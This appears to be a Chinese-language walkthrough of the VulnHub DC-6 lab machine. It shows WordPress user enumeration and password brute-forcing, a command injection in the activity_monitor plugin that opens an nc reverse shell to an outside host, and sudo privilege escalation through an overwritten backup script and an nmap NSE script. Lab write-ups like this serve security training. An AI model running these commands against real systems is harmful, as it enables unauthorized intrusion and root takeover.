僅供個人娛樂
靶機信息
下載地址:https://download.vulnhub.com/dc/DC-6.zip
一、主機發現
nmap -sn 192.168.216.0/24
二、端口掃描
nmap -p 1-65535 -sV 192.168.216.132
三、漏洞查找和利用
80端口
打開網頁
發現其中 web 服務被重定向到 http://wordy/ 修改host文件
echo "192.168.216.131 literally.vulnerable" >> /etc/hosts
或者在C:\Windows\System32\drivers\etc下的HOSTS文件中增加192.168.216.132 wordy
wpscan --urlhttp://wordy/ --enumerate 主題
wpscan --urlhttp://wordy/ --e u 用戶
爆破出5個用戶名admin,jens,graham,sarah,mark 將其作為字典爆破,直接用kali自帶的/usr/share/wordlists/rockyou.txt ,我的字典復制到root目錄下了
wpscan --url http://wordy/ -U 1.txt -P /root/rockyou.txt
爆破出密碼 賬號密碼mark helpdesk01
目錄
我們使用獲得的密碼登錄http://wordy/wp-admin/
可以看到安裝了activity_monitor插件
searchsploit activity monitor
修改腳本
開啟一個簡單的臨時的web服務,去訪問45274.html 來觸發漏洞
python -m SimpleHTTPServer 8000
啟動網頁
多次測試修改,為了方便改為1.html
python -c 'import pty; pty.spawn("/bin/bash") #使用交互式命令行'
或者訪問http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools輸入ip,點擊lookup,通過抓包修改ip參數的值為baidu.com | nc -e /bin/bash 192.168.216.128 4444
反彈成功
拿到shell開始信息收集
用戶名和密碼: graham GSo7isUM1D4,由於系統開啟了ssh
使用sudo -l 查看目前用戶可以執行的操作,發現我們可以運行jens用戶下面的backups.sh。查看其內容是對web進行打包備份的
查看信息
執行這個腳本的時候會以jens用戶來執行,方法:sudo -u jens /home/jens/backups.sh
可以讓jens執行/bin/bash就直接得到了jens的shell
首先需要刪除
graham@dc-6:~$ cd /home/jens
graham@dc-6:/home/jens$ ls
backups.sh
graham@dc-6:/home/jens$ cat /dev/null > backups.sh
graham@dc-6:/home/jens$ cat backups.sh
graham@dc-6:/home/jens$ ls
backups.sh
graham@dc-6:/home/jens$ cat backups.s
graham@dc-6:/home/jens$ echo "/bin/bash" >>/home/jens/backups.sh
graham@dc-6:/home/jens$ cat /home/jens/backups.sh
/bin/bash
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
jens@dc-6:~$ whoami
jens
已經是jens用戶了,我們繼續執行sudo -l 命令去查找我們可以進行的操作。
NOPASSWD: /usr/bin/nmap,jens用戶可以在無需輸入密碼的情況下使用nmap,我們繼續使用nmap去調用我們的腳本例如/bin/bash.
nmap提權
nmap有執行腳本的功能,通過編寫特殊腳本,可以實現利用nmap提權(sudo提權)
利用過程:寫入一個執行bash的nmap腳本,運行
echo "os.execute('/bin/bash')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse
